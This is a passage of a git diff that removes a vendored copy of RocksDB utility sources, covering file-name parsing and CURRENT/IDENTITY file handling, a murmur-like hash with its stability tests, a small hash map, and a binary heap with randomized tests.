-  } else if (rest.starts_with("MANIFEST-")) {
-    rest.remove_prefix(strlen("MANIFEST-"));
-    uint64_t num;
-    if (!ConsumeDecimalNumber(&rest, &num)) {
-      return false;
-    }
-    if (!rest.empty()) {
-      return false;
-    }
-    *type = kDescriptorFile;
-    *number = num;
-  } else if (rest.starts_with("METADB-")) {
-    rest.remove_prefix(strlen("METADB-"));
-    uint64_t num;
-    if (!ConsumeDecimalNumber(&rest, &num)) {
-      return false;
-    }
-    if (!rest.empty()) {
-      return false;
-    }
-    *type = kMetaDatabase;
-    *number = num;
-  } else if (rest.starts_with(kOptionsFileNamePrefix)) {
-    uint64_t ts_suffix;
-    bool is_temp_file = false;
-    rest.remove_prefix(kOptionsFileNamePrefix.size());
-    const std::string kTempFileNameSuffixWithDot =
-        std::string(".") + kTempFileNameSuffix;
-    if (rest.ends_with(kTempFileNameSuffixWithDot)) {
-      rest.remove_suffix(kTempFileNameSuffixWithDot.size());
-      is_temp_file = true;
-    }
-    if (!ConsumeDecimalNumber(&rest, &ts_suffix)) {
-      return false;
-    }
-    *number = ts_suffix;
-    *type = is_temp_file ? kTempFile : kOptionsFile;
-  } else {
-    // Avoid strtoull() to keep filename format independent of the
-    // current locale
-    bool archive_dir_found = false;
-    if (rest.starts_with(ARCHIVAL_DIR)) {
-      if (rest.size() <= ARCHIVAL_DIR.size()) {
-        return false;
-      }
-      rest.remove_prefix(ARCHIVAL_DIR.size() + 1); // Add 1 to remove / also
-      if (log_type) {
-        *log_type = kArchivedLogFile;
-      }
-      archive_dir_found = true;
-    }
-    uint64_t num;
-    if (!ConsumeDecimalNumber(&rest, &num)) {
-      return false;
-    }
-    if (rest.size() <= 1 || rest[0] != '.') {
-      return false;
-    }
-    rest.remove_prefix(1);
-
-    Slice suffix = rest;
-    if (suffix == Slice("log")) {
-      *type = kLogFile;
-      if (log_type && !archive_dir_found) {
-        *log_type = kAliveLogFile;
-      }
-    } else if (archive_dir_found) {
-      return false; // Archive dir can contain only log files
-    } else if (suffix == Slice(kRocksDbTFileExt) ||
-               suffix == Slice(kLevelDbTFileExt)) {
-      *type = kTableFile;
-    } else if (suffix == Slice(kRocksDBBlobFileExt)) {
-      *type = kBlobFile;
-    } else if (suffix == Slice(kTempFileNameSuffix)) {
-      *type = kTempFile;
-    } else {
-      return false;
-    }
-    *number = num;
-  }
-  return true;
-}
-
-Status SetCurrentFile(Env* env, const std::string& dbname,
-                      uint64_t descriptor_number,
-                      Directory* directory_to_fsync) {
-  // Remove leading "dbname/" and add newline to manifest file name
-  std::string manifest = DescriptorFileName(dbname, descriptor_number);
-  Slice contents = manifest;
-  assert(contents.starts_with(dbname + "/"));
-  contents.remove_prefix(dbname.size() + 1);
-  std::string tmp = TempFileName(dbname, descriptor_number);
-  Status s = WriteStringToFile(env, contents.ToString() + "\n", tmp, true);
-  if (s.ok()) {
-    TEST_KILL_RANDOM("SetCurrentFile:0", rocksdb_kill_odds * REDUCE_ODDS2);
-    s = env->RenameFile(tmp, CurrentFileName(dbname));
-    TEST_KILL_RANDOM("SetCurrentFile:1", rocksdb_kill_odds * REDUCE_ODDS2);
-  }
-  if (s.ok()) {
-    if (directory_to_fsync != nullptr) {
-      directory_to_fsync->Fsync();
-    }
-  } else {
-    env->DeleteFile(tmp);
-  }
-  return s;
-}
-
-Status SetIdentityFile(Env* env, const std::string& dbname) {
-  std::string id = env->GenerateUniqueId();
-  assert(!id.empty());
-  // Reserve the filename dbname/000000.dbtmp for the temporary identity file
-  std::string tmp = TempFileName(dbname, 0);
-  Status s = WriteStringToFile(env, id, tmp, true);
-  if (s.ok()) {
-    s = env->RenameFile(tmp, IdentityFileName(dbname));
-  }
-  if (!s.ok()) {
-    env->DeleteFile(tmp);
-  }
-  return s;
-}
-
-Status SyncManifest(Env* env, const ImmutableDBOptions* db_options,
-                    WritableFileWriter* file) {
-  TEST_KILL_RANDOM("SyncManifest:0", rocksdb_kill_odds * REDUCE_ODDS2);
-  StopWatch sw(env, db_options->statistics.get(), MANIFEST_FILE_SYNC_MICROS);
-  return file->Sync(db_options->use_fsync);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/filename.h b/thirdparty/rocksdb/util/filename.h
deleted file mode 100644
index 0d4bacf..0000000
--- a/thirdparty/rocksdb/util/filename.h
+++ /dev/null
@@ -1,169 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// File names used by DB code
-
-#pragma once
-#include <stdint.h>
-#include <unordered_map>
-#include <string>
-#include <vector>
-
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/transaction_log.h"
-
-namespace rocksdb {
-
-class Env;
-class Directory;
-class WritableFileWriter;
-
-enum FileType {
-  kLogFile,
-  kDBLockFile,
-  kTableFile,
-  kDescriptorFile,
-  kCurrentFile,
-  kTempFile,
-  kInfoLogFile,  // Either the current one, or an old one
-  kMetaDatabase,
-  kIdentityFile,
-  kOptionsFile,
-  kBlobFile
-};
-
-// Return the name of the log file with the specified number
-// in the db named by "dbname".  The result will be prefixed with
-// "dbname".
-extern std::string LogFileName(const std::string& dbname, uint64_t number);
-
-extern std::string BlobFileName(const std::string& bdirname, uint64_t number);
-
-static const std::string ARCHIVAL_DIR = "archive";
-
-extern std::string ArchivalDirectory(const std::string& dbname);
-
-//  Return the name of the archived log file with the specified number
-//  in the db named by "dbname". The result will be prefixed with "dbname".
-extern std::string ArchivedLogFileName(const std::string& dbname,
-                                       uint64_t num);
-
-extern std::string MakeTableFileName(const std::string& name, uint64_t number);
-
-// Return the name of sstable with LevelDB suffix
-// created from RocksDB sstable suffixed name
-extern std::string Rocks2LevelTableFileName(const std::string& fullname);
-
-// the reverse function of MakeTableFileName
-// TODO(yhchiang): could merge this function with ParseFileName()
-extern uint64_t TableFileNameToNumber(const std::string& name);
-
-// Return the name of the sstable with the specified number
-// in the db named by "dbname".  The result will be prefixed with
-// "dbname".
-extern std::string TableFileName(const std::vector<DbPath>& db_paths,
-                                 uint64_t number, uint32_t path_id);
-
-// Sufficient buffer size for FormatFileNumber.
-const size_t kFormatFileNumberBufSize = 38;
-
-extern void FormatFileNumber(uint64_t number, uint32_t path_id, char* out_buf,
-                             size_t out_buf_size);
-
-// Return the name of the descriptor file for the db named by
-// "dbname" and the specified incarnation number.  The result will be
-// prefixed with "dbname".
-extern std::string DescriptorFileName(const std::string& dbname,
-                                      uint64_t number);
-
-// Return the name of the current file.  This file contains the name
-// of the current manifest file.  The result will be prefixed with
-// "dbname".
-extern std::string CurrentFileName(const std::string& dbname);
-
-// Return the name of the lock file for the db named by
-// "dbname".  The result will be prefixed with "dbname".
-extern std::string LockFileName(const std::string& dbname);
-
-// Return the name of a temporary file owned by the db named "dbname".
-// The result will be prefixed with "dbname".
-extern std::string TempFileName(const std::string& dbname, uint64_t number);
-
-// A helper structure for prefix of info log names.
-struct InfoLogPrefix {
-  char buf[260];
-  Slice prefix;
-  // Prefix with DB absolute path encoded
-  explicit InfoLogPrefix(bool has_log_dir, const std::string& db_absolute_path);
-  // Default Prefix
-  explicit InfoLogPrefix();
-};
-
-// Return the name of the info log file for "dbname".
-extern std::string InfoLogFileName(const std::string& dbname,
-                                   const std::string& db_path = "",
-                                   const std::string& log_dir = "");
-
-// Return the name of the old info log file for "dbname".
-extern std::string OldInfoLogFileName(const std::string& dbname, uint64_t ts,
-                                      const std::string& db_path = "",
-                                      const std::string& log_dir = "");
-
-static const std::string kOptionsFileNamePrefix = "OPTIONS-";
-static const std::string kTempFileNameSuffix = "dbtmp";
-
-// Return a options file name given the "dbname" and file number.
-// Format:  OPTIONS-[number].dbtmp
-extern std::string OptionsFileName(const std::string& dbname,
-                                   uint64_t file_num);
-
-// Return a temp options file name given the "dbname" and file number.
-// Format:  OPTIONS-[number]
-extern std::string TempOptionsFileName(const std::string& dbname,
-                                       uint64_t file_num);
-
-// Return the name to use for a metadatabase. The result will be prefixed with
-// "dbname".
-extern std::string MetaDatabaseName(const std::string& dbname,
-                                    uint64_t number);
-
-// Return the name of the Identity file which stores a unique number for the db
-// that will get regenerated if the db loses all its data and is recreated fresh
-// either from a backup-image or empty
-extern std::string IdentityFileName(const std::string& dbname);
-
-// If filename is a rocksdb file, store the type of the file in *type.
-// The number encoded in the filename is stored in *number.  If the
-// filename was successfully parsed, returns true.  Else return false.
-// info_log_name_prefix is the path of info logs.
-extern bool ParseFileName(const std::string& filename, uint64_t* number,
-                          const Slice& info_log_name_prefix, FileType* type,
-                          WalFileType* log_type = nullptr);
-// Same as previous function, but skip info log files.
-extern bool ParseFileName(const std::string& filename, uint64_t* number,
-                          FileType* type, WalFileType* log_type = nullptr);
-
-// Make the CURRENT file point to the descriptor file with the
-// specified number.
-extern Status SetCurrentFile(Env* env, const std::string& dbname,
-                             uint64_t descriptor_number,
-                             Directory* directory_to_fsync);
-
-// Make the IDENTITY file for the db
-extern Status SetIdentityFile(Env* env, const std::string& dbname);
-
-// Sync manifest file `file`.
-extern Status SyncManifest(Env* env, const ImmutableDBOptions* db_options,
-                           WritableFileWriter* file);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/filter_policy.cc b/thirdparty/rocksdb/util/filter_policy.cc
deleted file mode 100644
index efb9bf4..0000000
--- a/thirdparty/rocksdb/util/filter_policy.cc
+++ /dev/null
@@ -1,16 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/filter_policy.h"
-
-namespace rocksdb {
-
-FilterPolicy::~FilterPolicy() { }
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/hash.cc b/thirdparty/rocksdb/util/hash.cc
deleted file mode 100644
index a0660c6..0000000
--- a/thirdparty/rocksdb/util/hash.cc
+++ /dev/null
@@ -1,56 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <string.h>
-#include "util/coding.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-uint32_t Hash(const char* data, size_t n, uint32_t seed) {
-  // Similar to murmur hash
-  const uint32_t m = 0xc6a4a793;
-  const uint32_t r = 24;
-  const char* limit = data + n;
-  uint32_t h = static_cast<uint32_t>(seed ^ (n * m));
-
-  // Pick up four bytes at a time
-  while (data + 4 <= limit) {
-    uint32_t w = DecodeFixed32(data);
-    data += 4;
-    h += w;
-    h *= m;
-    h ^= (h >> 16);
-  }
-
-  // Pick up remaining bytes
-  switch (limit - data) {
-    // Note: The original hash implementation used data[i] << shift, which
-    // promotes the char to int and then performs the shift. If the char is
-    // negative, the shift is undefined behavior in C++. The hash algorithm is
-    // part of the format definition, so we cannot change it; to obtain the same
-    // behavior in a legal way we just cast to uint32_t, which will do
-    // sign-extension. To guarantee compatibility with architectures where chars
-    // are unsigned we first cast the char to int8_t.
-    case 3:
-      h += static_cast<uint32_t>(static_cast<int8_t>(data[2])) << 16;
-    // fall through
-    case 2:
-      h += static_cast<uint32_t>(static_cast<int8_t>(data[1])) << 8;
-    // fall through
-    case 1:
-      h += static_cast<uint32_t>(static_cast<int8_t>(data[0]));
-      h *= m;
-      h ^= (h >> r);
-      break;
-  }
-  return h;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/hash.h b/thirdparty/rocksdb/util/hash.h
deleted file mode 100644
index 4a13f45..0000000
--- a/thirdparty/rocksdb/util/hash.h
+++ /dev/null
@@ -1,35 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Simple hash function used for internal data structures
-
-#pragma once
-#include <stddef.h>
-#include <stdint.h>
-
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-extern uint32_t Hash(const char* data, size_t n, uint32_t seed);
-
-inline uint32_t BloomHash(const Slice& key) {
-  return Hash(key.data(), key.size(), 0xbc9f1d34);
-}
-
-inline uint32_t GetSliceHash(const Slice& s) {
-  return Hash(s.data(), s.size(), 397);
-}
-
-// std::hash compatible interface.
-struct SliceHasher {
-  uint32_t operator()(const Slice& s) const { return GetSliceHash(s); }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/hash_map.h b/thirdparty/rocksdb/util/hash_map.h
deleted file mode 100644
index 7b08fb3..0000000
--- a/thirdparty/rocksdb/util/hash_map.h
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-
-#include <algorithm>
-#include <array>
-#include <utility>
-
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-// This is similar to std::unordered_map, except that it tries to avoid
-// allocating or deallocating memory as much as possible. With
-// std::unordered_map, an allocation/deallocation is made for every insertion
-// or deletion because of the requirement that iterators remain valid even
-// with insertions or deletions. This means that the hash chains will be
-// implemented as linked lists.
-//
-// This implementation uses autovector as hash chains insteads.
-//
-template <typename K, typename V, size_t size = 128>
-class HashMap {
-  std::array<autovector<std::pair<K, V>, 1>, size> table_;
-
- public:
-  bool Contains(K key) {
-    auto& bucket = table_[key % size];
-    auto it = std::find_if(
-        bucket.begin(), bucket.end(),
-        [key](const std::pair<K, V>& p) { return p.first == key; });
-    return it != bucket.end();
-  }
-
-  void Insert(K key, V value) {
-    auto& bucket = table_[key % size];
-    bucket.push_back({key, value});
-  }
-
-  void Delete(K key) {
-    auto& bucket = table_[key % size];
-    auto it = std::find_if(
-        bucket.begin(), bucket.end(),
-        [key](const std::pair<K, V>& p) { return p.first == key; });
-    if (it != bucket.end()) {
-      auto last = bucket.end() - 1;
-      if (it != last) {
-        *it = *last;
-      }
-      bucket.pop_back();
-    }
-  }
-
-  V& Get(K key) {
-    auto& bucket = table_[key % size];
-    auto it = std::find_if(
-        bucket.begin(), bucket.end(),
-        [key](const std::pair<K, V>& p) { return p.first == key; });
-    return it->second;
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/hash_test.cc b/thirdparty/rocksdb/util/hash_test.cc
deleted file mode 100644
index 959e8cd..0000000
--- a/thirdparty/rocksdb/util/hash_test.cc
+++ /dev/null
@@ -1,73 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <vector>
-
-#include "util/hash.h"
-#include "util/testharness.h"
-
-// The hash algorithm is part of the file format, for example for the Bloom
-// filters. Test that the hash values are stable for a set of random strings of
-// varying lengths.
-TEST(HashTest, Values) {
-  using rocksdb::Hash;
-  constexpr uint32_t kSeed = 0xbc9f1d34;  // Same as BloomHash.
-
-  EXPECT_EQ(Hash("", 0, kSeed), 3164544308);
-  EXPECT_EQ(Hash("\x08", 1, kSeed), 422599524);
-  EXPECT_EQ(Hash("\x17", 1, kSeed), 3168152998);
-  EXPECT_EQ(Hash("\x9a", 1, kSeed), 3195034349);
-  EXPECT_EQ(Hash("\x1c", 1, kSeed), 2651681383);
-  EXPECT_EQ(Hash("\x4d\x76", 2, kSeed), 2447836956);
-  EXPECT_EQ(Hash("\x52\xd5", 2, kSeed), 3854228105);
-  EXPECT_EQ(Hash("\x91\xf7", 2, kSeed), 31066776);
-  EXPECT_EQ(Hash("\xd6\x27", 2, kSeed), 1806091603);
-  EXPECT_EQ(Hash("\x30\x46\x0b", 3, kSeed), 3808221797);
-  EXPECT_EQ(Hash("\x56\xdc\xd6", 3, kSeed), 2157698265);
-  EXPECT_EQ(Hash("\xd4\x52\x33", 3, kSeed), 1721992661);
-  EXPECT_EQ(Hash("\x6a\xb5\xf4", 3, kSeed), 2469105222);
-  EXPECT_EQ(Hash("\x67\x53\x81\x1c", 4, kSeed), 118283265);
-  EXPECT_EQ(Hash("\x69\xb8\xc0\x88", 4, kSeed), 3416318611);
-  EXPECT_EQ(Hash("\x1e\x84\xaf\x2d", 4, kSeed), 3315003572);
-  EXPECT_EQ(Hash("\x46\xdc\x54\xbe", 4, kSeed), 447346355);
-  EXPECT_EQ(Hash("\xd0\x7a\x6e\xea\x56", 5, kSeed), 4255445370);
-  EXPECT_EQ(Hash("\x86\x83\xd5\xa4\xd8", 5, kSeed), 2390603402);
-  EXPECT_EQ(Hash("\xb7\x46\xbb\x77\xce", 5, kSeed), 2048907743);
-  EXPECT_EQ(Hash("\x6c\xa8\xbc\xe5\x99", 5, kSeed), 2177978500);
-  EXPECT_EQ(Hash("\x5c\x5e\xe1\xa0\x73\x81", 6, kSeed), 1036846008);
-  EXPECT_EQ(Hash("\x08\x5d\x73\x1c\xe5\x2e", 6, kSeed), 229980482);
-  EXPECT_EQ(Hash("\x42\xfb\xf2\x52\xb4\x10", 6, kSeed), 3655585422);
-  EXPECT_EQ(Hash("\x73\xe1\xff\x56\x9c\xce", 6, kSeed), 3502708029);
-  EXPECT_EQ(Hash("\x5c\xbe\x97\x75\x54\x9a\x52", 7, kSeed), 815120748);
-  EXPECT_EQ(Hash("\x16\x82\x39\x49\x88\x2b\x36", 7, kSeed), 3056033698);
-  EXPECT_EQ(Hash("\x59\x77\xf0\xa7\x24\xf4\x78", 7, kSeed), 587205227);
-  EXPECT_EQ(Hash("\xd3\xa5\x7c\x0e\xc0\x02\x07", 7, kSeed), 2030937252);
-  EXPECT_EQ(Hash("\x31\x1b\x98\x75\x96\x22\xd3\x9a", 8, kSeed), 469635402);
-  EXPECT_EQ(Hash("\x38\xd6\xf7\x28\x20\xb4\x8a\xe9", 8, kSeed), 3530274698);
-  EXPECT_EQ(Hash("\xbb\x18\x5d\xf4\x12\x03\xf7\x99", 8, kSeed), 1974545809);
-  EXPECT_EQ(Hash("\x80\xd4\x3b\x3b\xae\x22\xa2\x78", 8, kSeed), 3563570120);
-  EXPECT_EQ(Hash("\x1a\xb5\xd0\xfe\xab\xc3\x61\xb2\x99", 9, kSeed), 2706087434);
-  EXPECT_EQ(Hash("\x8e\x4a\xc3\x18\x20\x2f\x06\xe6\x3c", 9, kSeed), 1534654151);
-  EXPECT_EQ(Hash("\xb6\xc0\xdd\x05\x3f\xc4\x86\x4c\xef", 9, kSeed), 2355554696);
-  EXPECT_EQ(Hash("\x9a\x5f\x78\x0d\xaf\x50\xe1\x1f\x55", 9, kSeed), 1400800912);
-  EXPECT_EQ(Hash("\x22\x6f\x39\x1f\xf8\xdd\x4f\x52\x17\x94", 10, kSeed),
-            3420325137);
-  EXPECT_EQ(Hash("\x32\x89\x2a\x75\x48\x3a\x4a\x02\x69\xdd", 10, kSeed),
-            3427803584);
-  EXPECT_EQ(Hash("\x06\x92\x5c\xf4\x88\x0e\x7e\x68\x38\x3e", 10, kSeed),
-            1152407945);
-  EXPECT_EQ(Hash("\xbd\x2c\x63\x38\xbf\xe9\x78\xb7\xbf\x15", 10, kSeed),
-            3382479516);
-}
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/heap.h b/thirdparty/rocksdb/util/heap.h
deleted file mode 100644
index 4d58941..0000000
--- a/thirdparty/rocksdb/util/heap.h
+++ /dev/null
@@ -1,166 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <algorithm>
-#include <cstdint>
-#include <functional>
-#include "port/port.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-// Binary heap implementation optimized for use in multi-way merge sort.
-// Comparison to std::priority_queue:
-// - In libstdc++, std::priority_queue::pop() usually performs just over logN
-//   comparisons but never fewer.
-// - std::priority_queue does not have a replace-top operation, requiring a
-//   pop+push.  If the replacement element is the new top, this requires
-//   around 2logN comparisons.
-// - This heap's pop() uses a "schoolbook" downheap which requires up to ~2logN
-//   comparisons.
-// - This heap provides a replace_top() operation which requires [1, 2logN]
-//   comparisons.  When the replacement element is also the new top, this
-//   takes just 1 or 2 comparisons.
-//
-// The last property can yield an order-of-magnitude performance improvement
-// when merge-sorting real-world non-random data.  If the merge operation is
-// likely to take chunks of elements from the same input stream, only 1
-// comparison per element is needed.  In RocksDB-land, this happens when
-// compacting a database where keys are not randomly distributed across L0
-// files but nearby keys are likely to be in the same L0 file.
-//
-// The container uses the same counterintuitive ordering as
-// std::priority_queue: the comparison operator is expected to provide the
-// less-than relation, but top() will return the maximum.
-
-template<typename T, typename Compare = std::less<T>>
-class BinaryHeap {
- public:
-  BinaryHeap() { }
-  explicit BinaryHeap(Compare cmp) : cmp_(std::move(cmp)) { }
-
-  void push(const T& value) {
-    data_.push_back(value);
-    upheap(data_.size() - 1);
-  }
-
-  void push(T&& value) {
-    data_.push_back(std::move(value));
-    upheap(data_.size() - 1);
-  }
-
-  const T& top() const {
-    assert(!empty());
-    return data_.front();
-  }
-
-  void replace_top(const T& value) {
-    assert(!empty());
-    data_.front() = value;
-    downheap(get_root());
-  }
-
-  void replace_top(T&& value) {
-    assert(!empty());
-    data_.front() = std::move(value);
-    downheap(get_root());
-  }
-
-  void pop() {
-    assert(!empty());
-    data_.front() = std::move(data_.back());
-    data_.pop_back();
-    if (!empty()) {
-      downheap(get_root());
-    } else {
-      reset_root_cmp_cache();
-    }
-  }
-
-  void swap(BinaryHeap &other) {
-    std::swap(cmp_, other.cmp_);
-    data_.swap(other.data_);
-    std::swap(root_cmp_cache_, other.root_cmp_cache_);
-  }
-
-  void clear() {
-    data_.clear();
-    reset_root_cmp_cache();
-  }
-
-  bool empty() const {
-    return data_.empty();
-  }
-
-  void reset_root_cmp_cache() { root_cmp_cache_ = port::kMaxSizet; }
-
- private:
-  static inline size_t get_root() { return 0; }
-  static inline size_t get_parent(size_t index) { return (index - 1) / 2; }
-  static inline size_t get_left(size_t index) { return 2 * index + 1; }
-  static inline size_t get_right(size_t index) { return 2 * index + 2; }
-
-  void upheap(size_t index) {
-    T v = std::move(data_[index]);
-    while (index > get_root()) {
-      const size_t parent = get_parent(index);
-      if (!cmp_(data_[parent], v)) {
-        break;
-      }
-      data_[index] = std::move(data_[parent]);
-      index = parent;
-    }
-    data_[index] = std::move(v);
-    reset_root_cmp_cache();
-  }
-
-  void downheap(size_t index) {
-    T v = std::move(data_[index]);
-
-    size_t picked_child = port::kMaxSizet;
-    while (1) {
-      const size_t left_child = get_left(index);
-      if (get_left(index) >= data_.size()) {
-        break;
-      }
-      const size_t right_child = left_child + 1;
-      assert(right_child == get_right(index));
-      picked_child = left_child;
-      if (index == 0 && root_cmp_cache_ < data_.size()) {
-        picked_child = root_cmp_cache_;
-      } else if (right_child < data_.size() &&
-                 cmp_(data_[left_child], data_[right_child])) {
-        picked_child = right_child;
-      }
-      if (!cmp_(v, data_[picked_child])) {
-        break;
-      }
-      data_[index] = std::move(data_[picked_child]);
-      index = picked_child;
-    }
-
-    if (index == 0) {
-      // We did not change anything in the tree except for the value
-      // of the root node, left and right child did not change, we can
-      // cache that `picked_child` is the smallest child
-      // so next time we compare againist it directly
-      root_cmp_cache_ = picked_child;
-    } else {
-      // the tree changed, reset cache
-      reset_root_cmp_cache();
-    }
-
-    data_[index] = std::move(v);
-  }
-
-  Compare cmp_;
-  autovector<T> data_;
-  // Used to reduce number of cmp_ calls in downheap()
-  size_t root_cmp_cache_ = port::kMaxSizet;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/heap_test.cc b/thirdparty/rocksdb/util/heap_test.cc
deleted file mode 100644
index b415615..0000000
--- a/thirdparty/rocksdb/util/heap_test.cc
+++ /dev/null
@@ -1,139 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <gtest/gtest.h>
-
-#include <climits>
-
-#include <queue>
-#include <random>
-#include <utility>
-
-#include "util/heap.h"
-
-#ifndef GFLAGS
-const int64_t FLAGS_iters = 100000;
-#else
-#include <gflags/gflags.h>
-DEFINE_int64(iters, 100000, "number of pseudo-random operations in each test");
-#endif  // GFLAGS
-
-/*
- * Compares the custom heap implementation in util/heap.h against
- * std::priority_queue on a pseudo-random sequence of operations.
- */
-
-namespace rocksdb {
-
-using HeapTestValue = uint64_t;
-using Params = std::tuple<size_t, HeapTestValue, int64_t>;
-
-class HeapTest : public ::testing::TestWithParam<Params> {
-};
-
-TEST_P(HeapTest, Test) {
-  // This test performs the same pseudorandom sequence of operations on a
-  // BinaryHeap and an std::priority_queue, comparing output.  The three
-  // possible operations are insert, replace top and pop.
-  //
-  // Insert is chosen slightly more often than the others so that the size of
-  // the heap slowly grows.  Once the size heats the MAX_HEAP_SIZE limit, we
-  // disallow inserting until the heap becomes empty, testing the "draining"
-  // scenario.
-
-  const auto MAX_HEAP_SIZE = std::get<0>(GetParam());
-  const auto MAX_VALUE = std::get<1>(GetParam());
-  const auto RNG_SEED = std::get<2>(GetParam());
-
-  BinaryHeap<HeapTestValue> heap;
-  std::priority_queue<HeapTestValue> ref;
-
-  std::mt19937 rng(static_cast<unsigned int>(RNG_SEED));
-  std::uniform_int_distribution<HeapTestValue> value_dist(0, MAX_VALUE);
-  int ndrains = 0;
-  bool draining = false;     // hit max size, draining until we empty the heap
-  size_t size = 0;
-  for (int64_t i = 0; i < FLAGS_iters; ++i) {
-    if (size == 0) {
-      draining = false;
-    }
-
-    if (!draining &&
-        (size == 0 || std::bernoulli_distribution(0.4)(rng))) {
-      // insert
-      HeapTestValue val = value_dist(rng);
-      heap.push(val);
-      ref.push(val);
-      ++size;
-      if (size == MAX_HEAP_SIZE) {
-        draining = true;
-        ++ndrains;
-      }
-    } else if (std::bernoulli_distribution(0.5)(rng)) {
-      // replace top
-      HeapTestValue val = value_dist(rng);
-      heap.replace_top(val);
-      ref.pop();
-      ref.push(val);
-    } else {
-      // pop
-      assert(size > 0);
-      heap.pop();
-      ref.pop();
-      --size;
-    }
-
-    // After every operation, check that the public methods give the same
-    // results
-    assert((size == 0) == ref.empty());
-    ASSERT_EQ(size == 0, heap.empty());
-    if (size > 0) {
-      ASSERT_EQ(ref.top(), heap.top());
-    }
-  }
-
-  // Probabilities should be set up to occasionally hit the max heap size and
-  // drain it
-  assert(ndrains > 0);
-
-  heap.clear();
-  ASSERT_TRUE(heap.empty());
-}
-
-// Basic test, MAX_VALUE = 3*MAX_HEAP_SIZE (occasional duplicates)
-INSTANTIATE_TEST_CASE_P(
-  Basic, HeapTest,
-  ::testing::Values(Params(1000, 3000, 0x1b575cf05b708945))
-);
-// Mid-size heap with small values (many duplicates)
-INSTANTIATE_TEST_CASE_P(
-  SmallValues, HeapTest,
-  ::testing::Values(Params(100, 10, 0x5ae213f7bd5dccd0))
-);
-// Small heap, large value range (no duplicates)
-INSTANTIATE_TEST_CASE_P(
-  SmallHeap, HeapTest,
-  ::testing::Values(Params(10, ULLONG_MAX, 0x3e1fa8f4d01707cf))
-);
-// Two-element heap
-INSTANTIATE_TEST_CASE_P(
-  TwoElementHeap, HeapTest,
-  ::testing::Values(Params(2, 5, 0x4b5e13ea988c6abc))
-);
-// One-element heap
-INSTANTIATE_TEST_CASE_P(
-  OneElementHeap, HeapTest,
-  ::testing::Values(Params(1, 3, 0x176a1019ab0b612e))
-);
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-#ifdef GFLAGS
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, true);
-#endif  // GFLAGS
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/kv_map.h b/thirdparty/rocksdb/util/kv_map.h
deleted file mode 100644
index 784a244..0000000
--- a/thirdparty/rocksdb/util/kv_map.h
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
